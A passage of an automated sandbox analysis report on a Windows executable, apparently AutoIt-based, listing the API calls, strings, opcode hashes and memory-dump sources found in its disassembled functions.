                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                      • String ID: SeDebugPrivilege
                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                      • Opcode ID: 322b4ccac295274a7179428d889b9fe15fc781fb934714698e890a06b32408e1
                                                                                                      • Instruction ID: 2631738f18806e73920a7f5061eb74a26b8c4340ad8ea4abd8601494f051d8b9
                                                                                                      • Opcode Fuzzy Hash: 322b4ccac295274a7179428d889b9fe15fc781fb934714698e890a06b32408e1
                                                                                                      • Instruction Fuzzy Hash: 01616E35208201AFD710DF18C594F56BBE1EF54318F18849CE46A8BBA2CB75ED45CBE2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DA4284
                                                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00DA4299
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DA42B3
                                                                                                      • _wcslen.LIBCMT ref: 00DA42F8
                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00DA4325
                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DA4353
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window_wcslen
                                                                                                      • String ID: SysListView32
                                                                                                      • API String ID: 2147712094-78025650
                                                                                                      • Opcode ID: 9d903beecd28de2218d78790c9e5d60c76d0d56225c48823762bed9e505ed147
                                                                                                      • Instruction ID: 3bbbc4646dd76e1d6a4f7ddcd9788cfec8c45ceb077fc1885f661e79ffcaecea
                                                                                                      • Opcode Fuzzy Hash: 9d903beecd28de2218d78790c9e5d60c76d0d56225c48823762bed9e505ed147
                                                                                                      • Instruction Fuzzy Hash: 8241BE71A00308ABDF219F64CC49BEA7BA9EF49350F140126F955E7291D7B09984CBB4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D7C5D9
                                                                                                      • IsMenu.USER32(00000000), ref: 00D7C5F9
                                                                                                      • CreatePopupMenu.USER32 ref: 00D7C62F
                                                                                                      • GetMenuItemCount.USER32(01364998), ref: 00D7C680
                                                                                                      • InsertMenuItemW.USER32(01364998,?,00000001,00000030), ref: 00D7C6A8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                      • String ID: 0$2
                                                                                                      • API String ID: 93392585-3793063076
                                                                                                      • Opcode ID: c81f57d7e0465b897cb6e5c252daeefb1e26d718cfd08a8b4fbe76e9dfcece7a
                                                                                                      • Instruction ID: ddd84a3573099324a1aa3bde526289f00da066d3fa3ff800262a3511dad22e94
                                                                                                      • Opcode Fuzzy Hash: c81f57d7e0465b897cb6e5c252daeefb1e26d718cfd08a8b4fbe76e9dfcece7a
                                                                                                      • Instruction Fuzzy Hash: 61518D70A10305AFDB20DF68C9C4AAEBBF5AF45314F28A11EE419A72A1F7709940CB71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00D7D0D3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: IconLoad
                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                      • API String ID: 2457776203-404129466
                                                                                                      • Opcode ID: f103d2fe91498e1cafc1a1249c781ad456c402e104b2c1897b3a2051af797126
                                                                                                      • Instruction ID: 2c494f8dfc03be95daa3271d118e202df924e526b315b26ea22add35a1f88735
                                                                                                      • Opcode Fuzzy Hash: f103d2fe91498e1cafc1a1249c781ad456c402e104b2c1897b3a2051af797126
                                                                                                      • Instruction Fuzzy Hash: 1511E13124C306BEE7105A24AC82CEA77FDDF16320F60806BF908A6381FAB5AD064274
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                      • String ID: 0.0.0.0
                                                                                                      • API String ID: 642191829-3771769585
                                                                                                      • Opcode ID: 0f9949d2de9e57619cce230584f903cd094d6e333e2dea03de718b221441e1dc
                                                                                                      • Instruction ID: b6805b28798dd99cff6e9a04e4be744be8569c9817e1563d46ed680c20a575cb
                                                                                                      • Opcode Fuzzy Hash: 0f9949d2de9e57619cce230584f903cd094d6e333e2dea03de718b221441e1dc
                                                                                                      • Instruction Fuzzy Hash: 85110332900215AFDB286B709C4AEDE77BCDF49710F1440A5F54AD2091FF749A81DA70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcslen$LocalTime
                                                                                                      • String ID:
                                                                                                      • API String ID: 952045576-0
                                                                                                      • Opcode ID: 838392e16b6188418e8d871bdb79d17c0e32617fb83aa61efc654283c7446530
                                                                                                      • Instruction ID: 0f392cbfb08fa0a0bac4bf1d8e2574efdab9e23f4282a43bbe7bb2a43eda5eb8
                                                                                                      • Opcode Fuzzy Hash: 838392e16b6188418e8d871bdb79d17c0e32617fb83aa61efc654283c7446530
                                                                                                      • Instruction Fuzzy Hash: B64161A6C1121875CB11EBF89C4BDCEB7A9EF05310F508466E958E3131FA38E255C7B9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00D539BC,00000004,00000000,00000000), ref: 00D2FC4F
                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00D539BC,00000004,00000000,00000000), ref: 00D6FBB5
                                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00D539BC,00000004,00000000,00000000), ref: 00D6FC38
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ShowWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1268545403-0
                                                                                                      • Opcode ID: 93d1ee3aa18402ff7b658535d22a143bb393e1abb3731416b73666355fdd2400
                                                                                                      • Instruction ID: 1192dd42862c58c289e20caad7af06b53ee763fad7078798ee6683b5f0c15232
                                                                                                      • Opcode Fuzzy Hash: 93d1ee3aa18402ff7b658535d22a143bb393e1abb3731416b73666355fdd2400
                                                                                                      • Instruction Fuzzy Hash: 9E41FD30508B989BC7359B28F9D87367B75EBA6314F1C4D3CE88746A61C631D880E735
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00DA367A
                                                                                                      • GetDC.USER32(00000000), ref: 00DA3682
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DA368D
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00DA3699
                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00DA36D5
                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00DA36E6
                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00DA63C4,?,?,000000FF,00000000,?,000000FF,?), ref: 00DA3721
                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00DA3740
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3864802216-0
                                                                                                      • Opcode ID: 5df6b5f5a1d41cc089804dc5539e86c166d4812f595d51b40b2a41f5b3b97fa9
                                                                                                      • Instruction ID: 9c521ca5508afc6ae28a79a5396b2dba7f39cc9b8e1a8a726383ff9e2b9938ba
                                                                                                      • Opcode Fuzzy Hash: 5df6b5f5a1d41cc089804dc5539e86c166d4812f595d51b40b2a41f5b3b97fa9
                                                                                                      • Instruction Fuzzy Hash: B3317CB2201214BFEB258F50CC89FEB3BAAEF4A751F084055FE09DA291D6759D41CBB4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _memcmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 2931989736-0
                                                                                                      • Opcode ID: 28ecddbb58688bba069caa9844437759cc58f566e03b6c1484ce8c6d2e7d753c
                                                                                                      • Instruction ID: 8c77d27d37a9ace055870abd93415275b82d0dc6dcefbef0e35cb7cd99ec9e81
                                                                                                      • Opcode Fuzzy Hash: 28ecddbb58688bba069caa9844437759cc58f566e03b6c1484ce8c6d2e7d753c
                                                                                                      • Instruction Fuzzy Hash: 7B21D4B5600A06FFE30455126D42FAF779CEE013D8F188011FD0F9A649FBA1DE1682B2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                      • API String ID: 0-572801152
                                                                                                      • Opcode ID: 0d8ff2c61afe69525676d2b78c89edf8abcf5c0f6482f9e3798833c3703cf82e
                                                                                                      • Instruction ID: d1894164ece0f9c0cfc5a2f4b5b204cd35561cc3e24c88bfdcbac70cc2cb9514
                                                                                                      • Opcode Fuzzy Hash: 0d8ff2c61afe69525676d2b78c89edf8abcf5c0f6482f9e3798833c3703cf82e
                                                                                                      • Instruction Fuzzy Hash: FFD18C71A0070AAFDF11CF68D881AAEB7B5BB48314F188179E915AB285E770ED45CB60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCPInfo.KERNEL32(?,?), ref: 00D5196E
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00D519F1
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D51A84
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00D51A9B
                                                                                                        • Part of subcall function 00D43BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D36A99,?,0000015D,?,?,?,?,00D385D0,000000FF,00000000,?,?), ref: 00D43BE2
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D51B17
                                                                                                      • __freea.LIBCMT ref: 00D51B42
                                                                                                      • __freea.LIBCMT ref: 00D51B4E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2829977744-0
                                                                                                      • Opcode ID: fc3858e0622f3d537c4e96f223d9b42480392831038745e262e9a92064654268
                                                                                                      • Instruction ID: dfa3d39e37a8ad9f7646912d1df699b70d18d471b82868ac0861e9327a6f50b7
                                                                                                      • Opcode Fuzzy Hash: fc3858e0622f3d537c4e96f223d9b42480392831038745e262e9a92064654268
                                                                                                      • Instruction Fuzzy Hash: EC91C27AE002169ADF208F64C891FEEBBA5EF0A352F184159EC65E7241E725DD48CF70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Variant$ClearInit
                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                      • API String ID: 2610073882-625585964
                                                                                                      • Opcode ID: f40d9d008eb9c630c7119a3906fbe6ade56382592a5bea6331bc3e1924adf357
                                                                                                      • Instruction ID: 0cef971776661acf3a5c838e5934413e4a29cbb0a300bf664c32594ae79129ea
                                                                                                      • Opcode Fuzzy Hash: f40d9d008eb9c630c7119a3906fbe6ade56382592a5bea6331bc3e1924adf357
                                                                                                      • Instruction Fuzzy Hash: FF91BD71A0071AAFCF21CFA4D848FAEBBB8EF45314F148169F509AB285D7709945CBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00D81B30
                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D81B58
                                                                                                      • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00D81B7C
                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D81BAC
                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D81C33
                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D81C98
                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D81D04
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                      • String ID:
                                                                                                      • API String ID: 2550207440-0
                                                                                                      • Opcode ID: b4ec6ec8575fc0c3483c3b40e164ebccbda86827adcb2d5bed9633c3489df819
                                                                                                      • Instruction ID: e107d4f402690379ba805bb3e90e1d20175c17e8452bdc43ec63d702a3ef3e25
                                                                                                      • Opcode Fuzzy Hash: b4ec6ec8575fc0c3483c3b40e164ebccbda86827adcb2d5bed9633c3489df819
                                                                                                      • Instruction Fuzzy Hash: 5291D079900218AFDB00AF94D884BFEB7B9FF05711F144419E941E7291E774E98ACBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                      • String ID:
                                                                                                      • API String ID: 3225163088-0
                                                                                                      • Opcode ID: c6014974476495a2600c2e66053951238c02738a22b536293e92b76f439d320c
                                                                                                      • Instruction ID: 07c10b89f888fa2445dbf039be2ddbd8cd6202fa8c02fcf73cff1c3c97b725b5
                                                                                                      • Opcode Fuzzy Hash: c6014974476495a2600c2e66053951238c02738a22b536293e92b76f439d320c
                                                                                                      • Instruction Fuzzy Hash: EA911875E40219AFCB10CFA9DC84AEEBBB9FF49320F144155E911B7251DB78AA81CB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • VariantInit.OLEAUT32(?), ref: 00D942C8
                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00D943D7
                                                                                                      • _wcslen.LIBCMT ref: 00D943E7
                                                                                                      • VariantClear.OLEAUT32(?), ref: 00D9457C
                                                                                                        • Part of subcall function 00D815B3: VariantInit.OLEAUT32(00000000), ref: 00D815F3
                                                                                                        • Part of subcall function 00D815B3: VariantCopy.OLEAUT32(?,?), ref: 00D815FC
                                                                                                        • Part of subcall function 00D815B3: VariantClear.OLEAUT32(?), ref: 00D81608
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                      • API String ID: 4137639002-1221869570
                                                                                                      • Opcode ID: aefce344d571fe24f72b75f6484609cd131bbeee386a619bde310a83b7639942
                                                                                                      • Instruction ID: 1029b3210a34fca7c51402db972a3c68ae4684b494b388f104bcc03b018c91e1
                                                                                                      • Opcode Fuzzy Hash: aefce344d571fe24f72b75f6484609cd131bbeee386a619bde310a83b7639942
                                                                                                      • Instruction Fuzzy Hash: 39917C756083019FCB04EF64D48096ABBE5FF88714F14892DF88A97352DB71ED46CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D7089E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D707D1,80070057,?,?,?,00D70BEE), ref: 00D708BB
                                                                                                        • Part of subcall function 00D7089E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D707D1,80070057,?,?), ref: 00D708D6
                                                                                                        • Part of subcall function 00D7089E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D707D1,80070057,?,?), ref: 00D708E4
                                                                                                        • Part of subcall function 00D7089E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D707D1,80070057,?), ref: 00D708F4
                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00D955AE
                                                                                                      • _wcslen.LIBCMT ref: 00D956B6
                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00D9572C
